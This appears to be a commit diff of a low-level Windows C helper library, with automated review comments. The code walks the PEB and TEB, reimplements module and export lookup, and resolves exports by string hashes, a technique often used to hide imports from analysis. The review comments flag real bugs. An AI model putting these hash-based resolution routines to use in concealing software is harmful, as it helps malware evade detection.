HMODULE GetModuleHandleExA(LPCSTR lpModuleName)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
@ -12,7 +14,7 @@ HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
|
|||
Module = (PLDR_MODULE)((PBYTE)Next - 16);
|
||||
if (Module->BaseDllName.Buffer != NULL)
|
||||
{
|
||||
RfZeroMemory(wDllName, sizeof(wDllName));
|
||||
ZeroMemoryEx(wDllName, sizeof(wDllName));
|
||||
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
|
||||
if (StringCompareA(lpModuleName, wDllName) == 0)
|
||||
return (HMODULE)Module->BaseAddress;
|
||||
|
@ -22,7 +24,7 @@ HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
|
|||
return NULL;
|
||||
}
|
||||
|
||||
HMODULE RfGetModuleHandleW(LPCWSTR lpModuleName)
|
||||
HMODULE GetModuleHandleExW(LPCWSTR lpModuleName)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
@ -44,4 +46,4 @@ HMODULE RfGetModuleHandleW(LPCWSTR lpModuleName)
|
|||
}
|
||||
|
||||
return NULL;
|
||||
}
|
||||
}
|
|
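Review bot: Renaming RfGetModuleHandleA/W to `GetModuleHandleExA`/`GetModuleHandleExW` reuses the names of the Win32 functions declared in libloaderapi.h (`BOOL GetModuleHandleExA(DWORD, LPCSTR, HMODULE *)`) with a different signature; if Win32Helper.h includes windows.h this is a conflicting redeclaration, and at best it leaves readers unsure which function a call site invokes. A name outside the Win32 namespace, or the project's Rf prefix, would avoid the clash. `WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64)` copies from a UNICODE_STRING buffer that is not guaranteed to be NUL-terminated; wDllName's declaration is outside the hunk, so confirm 64 is its size. The functions continue outside the hunks.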
@ -1,4 +1,6 @@
|
|||
DWORD GetLinkedDllCount(VOID)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetNumberOfLinkedDlls(VOID)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
@ -15,4 +17,4 @@ DWORD GetLinkedDllCount(VOID)
|
|||
}
|
||||
|
||||
return dwCount;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetOSIdentificationData(DWORD Id)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
|
||||
switch (Id)
|
||||
{
|
||||
case 0:
|
||||
return Peb->OSMajorVersion;
|
||||
|
||||
case 1:
|
||||
return Peb->OSMinorVersion;
|
||||
|
||||
case 2:
|
||||
return Peb->OSBuildNumber;
|
||||
|
||||
case 3:
|
||||
return Peb->OSPlatformId;
|
||||
|
||||
default:
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
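Review bot: The `Id` selector uses bare magic values 0–3 and the trailing `return 0;` after the `switch` is unreachable since every path, including `default`, already returns; an enum such as `enum { OS_ID_MAJOR = 0, OS_ID_MINOR, OS_ID_BUILD, OS_ID_PLATFORM };` would document the contract and let callers avoid the numbers. Two caveats worth a comment: these PEB fields are the per-process view of the OS version, which application-compatibility shims can alter, so they are not an authoritative host fingerprint; and in the public PEB layouts I know, `OSBuildNumber` is a USHORT followed by `OSCSDVersion`, whereas Win32Helper.h declares it as a ULONG, so `Id == 2` may return the CSD version in its high word (`return Peb->OSBuildNumber & 0xFFFF;` if that is confirmed).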
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PPEB GetPeb(VOID)
|
||||
{
|
||||
#if defined(_WIN64)
|
||||
return (PPEB)__readgsqword(0x60);
|
||||
#elif define(_WIN32)
|
||||
return (PPEB)__readfsdword(0x30);
|
||||
#endif
|
||||
}
|
||||
|
||||
PPEB GetPebEx(VOID)
|
||||
{
|
||||
PTEB Teb;
|
||||
#if defined(_WIN64)
|
||||
Teb = (PTEB)__readgsqword(0x30);
|
||||
#elif define(_WIN32)
|
||||
Teb = (PTEB)__readfsdword(0x18);
|
||||
#endif
|
||||
return (PPEB)Teb->ProcessEnvironmentBlock;
|
||||
}
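Review bot: Both `#elif define(_WIN32)` lines are a typo for `defined(_WIN32)`; `define` is not a preprocessor operator, so a 32-bit build either fails in the `#elif` or takes no branch, leaving `GetPeb` and `GetPebEx` without a return statement (undefined behaviour, and every PEB-based routine in this commit builds on them). The fix is the two lines `#elif defined(_WIN32)`. The x64 path is correct: gs:[0x60] is the PEB pointer and gs:[0x30] the TEB self pointer.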
|
|
@ -1,4 +1,6 @@
|
|||
DWORD64 __stdcall RfGetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
PIMAGE_DOS_HEADER Dos;
|
||||
|
@ -16,14 +18,14 @@ DWORD64 __stdcall RfGetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
|
|||
for (DWORD dwX = 0; dwX < ExportTable->NumberOfNames; dwX++)
|
||||
{
|
||||
pFunctionName = FunctionNameAddressArray[dwX] + (PBYTE)ModuleBase;
|
||||
if(StringCompareA((PCHAR)pFunctionName, lpProcName) == 0)
|
||||
if (StringCompareA((PCHAR)pFunctionName, lpProcName) == 0)
|
||||
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
DWORD64 __stdcall RfGetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
|
||||
DWORD64 __stdcall GetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
PIMAGE_DOS_HEADER Dos;
|
||||
|
@ -51,4 +53,4 @@ DWORD64 __stdcall RfGetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressDjb2(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressDjb2(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(DWORD64 ModuleBase, DWORD6
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(DWORD64 ModuleBase, DWORD
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressLoseLose(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressLoseLose(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressRotr32(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressRotr32(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressSdbm(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressSdbm(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressSuperFastHash(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressUnknownGenericHash1(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetProcessHeapEx(VOID)
|
||||
{
|
||||
return GetPeb()->ProcessHeap;
|
||||
}
|
|
@ -1,26 +1,28 @@
|
|||
DWORD GetInMemoryModulePathFromLoaderLoadModuleA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetProcessPathFromLoaderLoadModuleA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
if (nBufferLength < Module->FullDllName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, Module->FullDllName.Buffer, Module->FullDllName.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD GetInMemoryModulePathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetProcessPathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
if(nBufferLength < Module->FullDllName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
if (nBufferLength < Module->FullDllName.Length)
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, Module->FullDllName.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return Module->FullDllName.Length;
|
||||
}
|
||||
}
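Review bot: The W variant's bounds check does not bound the copy: `nBufferLength < Module->FullDllName.Length` compares the caller's size against a byte count (UNICODE_STRING.Length is in bytes) and then `StringCopyW` copies until a NUL that a UNICODE_STRING buffer is not guaranteed to carry, so the terminator can land one WCHAR past a buffer that exactly fits and an unterminated buffer overruns it. The A variant has the mirror problem: it checks against `Length` but hands `MaximumLength` to `WCharStringToCharString`, so the check does not cover the amount that helper may copy (its exact semantics are not visible here). I would define `nBufferLength` as a WCHAR count, reserve one for the terminator, copy exactly `Length` bytes and terminate explicitly, as below for the W variant; the A variant should likewise pass `Length / sizeof(WCHAR)` and check that against its buffer.
```c
DWORD GetProcessPathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
{
	/* … unchanged: PEB lookup and Module = first InMemoryOrder entry … */

	/* UNICODE_STRING.Length is a byte count; nBufferLength is treated as a WCHAR count. */
	DWORD cchPath = Module->FullDllName.Length / sizeof(WCHAR);

	/* One extra WCHAR for the terminator: the loader's buffer is not guaranteed to have one. */
	if (lpBuffer == NULL || nBufferLength < cchPath + 1)
		return 0;

	CopyMemory(lpBuffer, Module->FullDllName.Buffer, Module->FullDllName.Length);
	lpBuffer[cchPath] = L'\0';

	return Module->FullDllName.Length;
}
```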
|
|
@ -1,22 +1,24 @@
|
|||
DWORD GetInMemoryModulePathFromProcessParametersA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetProcessPathFromProcessParametersA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->ImagePathName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->ImagePathName.Buffer, ProcessParameters->ImagePathName.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD GetInMemoryModulePathFromProcessParametersW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetProcessPathFromProcessParametersW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->ImagePathName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, ProcessParameters->ImagePathName.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return ProcessParameters->ImagePathName.Length;
|
||||
}
|
||||
}
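Review bot: Same sizing issue as the loader-module variant: `nBufferLength < ProcessParameters->ImagePathName.Length` checks against a byte count while the W copy (`StringCopyW`) runs until a NUL that a UNICODE_STRING is not guaranteed to carry, and the A copy is handed `MaximumLength` after the check was made against `Length`. Compute `cch = ProcessParameters->ImagePathName.Length / sizeof(WCHAR)`, require `nBufferLength >= cch + 1`, copy exactly `Length` bytes and write `lpBuffer[cch] = L'\0'` yourself; the unit of `nBufferLength` (bytes vs. WCHARs) should also be stated in a comment, since nothing here documents it.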
|
|
@ -1,4 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PRTL_USER_PROCESS_PARAMETERS GetRtlUserProcessParameters(VOID)
|
||||
{
|
||||
return GetPeb()->ProcessParameters;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
BOOL RfGetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL GetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PKUSER_SHARED_DATA SharedData = GetKUserSharedData();
|
||||
|
||||
|
@ -11,7 +13,7 @@ BOOL RfGetSystemWindowsDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
|||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL RfGetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
BOOL GetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PKUSER_SHARED_DATA SharedData = GetKUserSharedData();
|
||||
|
||||
|
@ -22,4 +24,4 @@ BOOL RfGetSystemWindowsDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
|||
return FALSE;
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
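Review bot: `GetSystemWindowsDirectoryA`/`W` are existing Win32 exports declared by sysinfoapi.h (via `<Windows.h>`) as `UINT GetSystemWindowsDirectoryA(LPSTR lpBuffer, UINT uSize)`, so this `BOOL (DWORD, PCHAR)` definition under the same name conflicts with that prototype in every translation unit that includes Win32Helper.h, and callers cannot tell which one they are calling. A name the SDK does not use, e.g. `GetSystemWindowsDirectoryExA`, keeps the KUSER_SHARED_DATA-based implementation distinguishable from the API it avoids. Not verified against a build; check the SDK headers in use.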
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PTEB GetTeb(VOID)
|
||||
{
|
||||
#if defined(_WIN64)
|
||||
|
@ -5,4 +7,4 @@ PTEB GetTeb(VOID)
|
|||
#elif define(_WIN32)
|
||||
return (PTEB)__readfsdword(0x18);
|
||||
#endif
|
||||
}
|
||||
}
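Review bot: The context line `#elif define(_WIN32)` is a pre-existing typo for `defined(_WIN32)` that this commit carries forward; on a 32-bit build the `__readfsdword(0x18)` branch is never selected and `GetTeb` falls off the end without returning, which every TEB-based helper added here (GetLastErrorEx, GetLastNtStatusEx, GetPebEx) then inherits. The fix is the one line `#elif defined(_WIN32)`.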
|
|
@ -0,0 +1,92 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//NOTE: PULONG must be pointed to an array of ULONG integers e.g. ULONG FileHash[4] = { 0 };
|
||||
BOOL HashFileByMsiFileHashTableW(PWCHAR Path, PULONG FileHash)
|
||||
{
|
||||
typedef struct _MSIFILEHASHINFO {
|
||||
ULONG dwFileHashInfoSize;
|
||||
ULONG dwData[4];
|
||||
} MSIFILEHASHINFO, * PMSIFILEHASHINFO;
|
||||
typedef UINT(WINAPI* MSIGETFILEHASHW)(LPCWSTR, DWORD, PMSIFILEHASHINFO);
|
||||
|
||||
MSIGETFILEHASHW MsiGetFileHashW = NULL;
|
||||
MSIFILEHASHINFO Hash = { 0 };
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(Hash);
|
||||
|
||||
hModule = LoadLibraryW(L"msi.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
MsiGetFileHashW = (MSIGETFILEHASHW)GetProcAddressW((DWORD64)hModule, L"MsiGetFileHashW");
|
||||
if (MsiGetFileHashW == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!IsPathValidW(Path))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(MSIFILEHASHINFO);
|
||||
if (MsiGetFileHashW(Path, 0, &Hash) != ERROR_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < 4; dwX++)
|
||||
FileHash[dwX] = Hash.dwData[dwX];
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL HashFileByMsiFileHashTableA(PCHAR Path, PULONG FileHash)
|
||||
{
|
||||
typedef struct _MSIFILEHASHINFO {
|
||||
ULONG dwFileHashInfoSize;
|
||||
ULONG dwData[4];
|
||||
} MSIFILEHASHINFO, * PMSIFILEHASHINFO;
|
||||
typedef UINT(WINAPI* MSIGETFILEHASHA)(LPCSTR, DWORD, PMSIFILEHASHINFO);
|
||||
|
||||
MSIGETFILEHASHA MsiGetFileHashA = NULL;
|
||||
MSIFILEHASHINFO Hash = { 0 };
|
||||
HMODULE hModule = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6384)
|
||||
if ((sizeof(FileHash) / sizeof(ULONG)) < 4)
|
||||
return FALSE;
|
||||
#pragma warning( pop )
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(Hash);
|
||||
|
||||
hModule = LoadLibraryW(L"msi.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
MsiGetFileHashA = (MSIGETFILEHASHA)GetProcAddressW((DWORD64)hModule, L"MsiGetFileHashA");
|
||||
if (MsiGetFileHashA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!IsPathValidA(Path))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Hash.dwFileHashInfoSize = sizeof(MSIFILEHASHINFO);
|
||||
if (MsiGetFileHashA(Path, 0, &Hash) != ERROR_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < 4; dwX++)
|
||||
FileHash[dwX] = Hash.dwData[dwX];
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
return bFlag;
|
||||
}
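Review bot: `HashFileByMsiFileHashTableA` can never succeed: `sizeof(FileHash) / sizeof(ULONG)` divides the size of a pointer (8 or 4 bytes) by 4, which is always below 4, so the function returns FALSE before loading msi.dll — the suppressed warning C6384 is exactly the diagnostic for this — and even past that check it never sets `bFlag = TRUE` the way the W variant does. Drop the `#pragma`/sizeof block (the W variant's comment-only contract for a 4-element array is the honest alternative) and add `bFlag = TRUE;` after the copy loop. Both variants load `msi.dll` by bare name through `LoadLibraryW`, which follows the default DLL search order; `LoadLibraryExW(L"msi.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32)` pins it to System32. Finally, `Hash.dwFileHashInfoSize` is assigned twice, and it is worth a comment that MsiGetFileHash is documented as a 128-bit MSI file hash (MD5-based as far as I know), so it is a change-detection value, not a collision-resistant integrity check.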
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringDjb2A(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 5381;
|
||||
|
@ -18,4 +20,4 @@ DWORD HashStringDjb2W(PWCHAR String)
|
|||
Hash = ((Hash << 5) + Hash) + c;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
ULONG HashStringFowlerNollVoVariant1aA(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 0x811c9dc5;
|
||||
|
@ -22,4 +24,4 @@ ULONG HashStringFowlerNollVoVariant1aW(PWCHAR String)
|
|||
}
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringJenkinsOneAtATime32BitA(PCHAR String)
|
||||
{
|
||||
SIZE_T Index = 0;
|
||||
|
@ -36,4 +38,4 @@ UINT32 HashStringJenkinsOneAtATime32BitW(PWCHAR String)
|
|||
Hash += Hash << 15;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringLoseLoseA(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
|
@ -18,4 +20,4 @@ DWORD HashStringLoseLoseW(PWCHAR String)
|
|||
Hash += c;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringRotr32SubA(UINT32 Value, UINT Count)
|
||||
{
|
||||
DWORD Mask = (CHAR_BIT * sizeof(Value) - 1);
|
||||
|
@ -36,4 +38,4 @@ INT HashStringRotr32W(PWCHAR String)
|
|||
Value = String[Index] + HashStringRotr32SubW(Value, 7);
|
||||
|
||||
return Value;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD HashStringSdbmA(PCHAR String)
|
||||
{
|
||||
ULONG Hash = 0;
|
||||
|
@ -18,4 +20,4 @@ DWORD HashStringSdbmW(PWCHAR String)
|
|||
Hash = c + (Hash << 6) + (Hash << 16) - Hash;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringSuperFastHashA(PCHAR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthA(String);
|
||||
|
@ -108,4 +110,4 @@ UINT32 HashStringSuperFastHashW(PWCHAR String)
|
|||
Hash += Hash >> 6;
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
INT HashStringUnknownGenericHash1A(PCHAR String)
|
||||
{
|
||||
PCHAR Pointer;
|
||||
|
@ -36,4 +38,4 @@ INT HashStringUnknownGenericHash1W(PWCHAR String)
|
|||
}
|
||||
|
||||
return Hash;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,490 @@
|
|||
#pragma once
|
||||
#include <Windows.h>
|
||||
|
||||
#define PROCESSOR_FEATURE_MAX 64
|
||||
|
||||
#define InitializeObjectAttributes(p, n, a, r, s) \
|
||||
{ \
|
||||
(p)->Length = sizeof(OBJECT_ATTRIBUTES); \
|
||||
(p)->RootDirectory = r; \
|
||||
(p)->Attributes = a; \
|
||||
(p)->ObjectName = n; \
|
||||
(p)->SecurityDescriptor = s; \
|
||||
(p)->SecurityQualityOfService = NULL; \
|
||||
}
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;
|
||||
|
||||
typedef struct _LDR_MODULE {
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
PVOID BaseAddress;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
SHORT LoadCount;
|
||||
SHORT TlsIndex;
|
||||
LIST_ENTRY HashTableEntry;
|
||||
ULONG TimeDateStamp;
|
||||
} LDR_MODULE, * PLDR_MODULE;
|
||||
|
||||
typedef struct _PEB_LDR_DATA {
|
||||
ULONG Length;
|
||||
ULONG Initialized;
|
||||
PVOID SsHandle;
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
||||
|
||||
typedef struct _CURDIR {
|
||||
UNICODE_STRING DosPath;
|
||||
PVOID Handle;
|
||||
}CURDIR, * PCURDIR;
|
||||
|
||||
typedef struct _STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PCHAR Buffer;
|
||||
} ANSI_STRING, * PANSI_STRING;
|
||||
|
||||
typedef struct _RTL_DRIVE_LETTER_CURDIR {
|
||||
WORD Flags;
|
||||
WORD Length;
|
||||
ULONG TimeStamp;
|
||||
ANSI_STRING DosPath;
|
||||
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;
|
||||
|
||||
typedef struct _RTL_USER_PROCESS_PARAMETERS {
|
||||
ULONG MaximumLength;
|
||||
ULONG Length;
|
||||
ULONG Flags;
|
||||
ULONG DebugFlags;
|
||||
PVOID ConsoleHandle;
|
||||
ULONG ConsoleFlags;
|
||||
PVOID StandardInput;
|
||||
PVOID StandardOutput;
|
||||
PVOID StandardError;
|
||||
CURDIR CurrentDirectory;
|
||||
UNICODE_STRING DllPath;
|
||||
UNICODE_STRING ImagePathName;
|
||||
UNICODE_STRING CommandLine;
|
||||
PVOID Environment;
|
||||
ULONG StartingX;
|
||||
ULONG StartingY;
|
||||
ULONG CountX;
|
||||
ULONG CountY;
|
||||
ULONG CountCharsX;
|
||||
ULONG CountCharsY;
|
||||
ULONG FillAttribute;
|
||||
ULONG WindowFlags;
|
||||
ULONG ShowWindowFlags;
|
||||
UNICODE_STRING WindowTitle;
|
||||
UNICODE_STRING DesktopInfo;
|
||||
UNICODE_STRING ShellInfo;
|
||||
UNICODE_STRING RuntimeData;
|
||||
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];
|
||||
ULONG EnvironmentSize;
|
||||
}RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
|
||||
|
||||
typedef struct _PEB {
|
||||
BOOLEAN InheritedAddressSpace;
|
||||
BOOLEAN ReadImageFileExecOptions;
|
||||
BOOLEAN BeingDebugged;
|
||||
BOOLEAN Spare;
|
||||
HANDLE Mutant;
|
||||
PVOID ImageBase;
|
||||
PPEB_LDR_DATA LoaderData;
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
|
||||
PVOID SubSystemData;
|
||||
PVOID ProcessHeap;
|
||||
PVOID FastPebLock;
|
||||
PVOID FastPebLockRoutine;
|
||||
PVOID FastPebUnlockRoutine;
|
||||
ULONG EnvironmentUpdateCount;
|
||||
PVOID* KernelCallbackTable;
|
||||
PVOID EventLogSection;
|
||||
PVOID EventLog;
|
||||
PVOID FreeList;
|
||||
ULONG TlsExpansionCounter;
|
||||
PVOID TlsBitmap;
|
||||
ULONG TlsBitmapBits[0x2];
|
||||
PVOID ReadOnlySharedMemoryBase;
|
||||
PVOID ReadOnlySharedMemoryHeap;
|
||||
PVOID* ReadOnlyStaticServerData;
|
||||
PVOID AnsiCodePageData;
|
||||
PVOID OemCodePageData;
|
||||
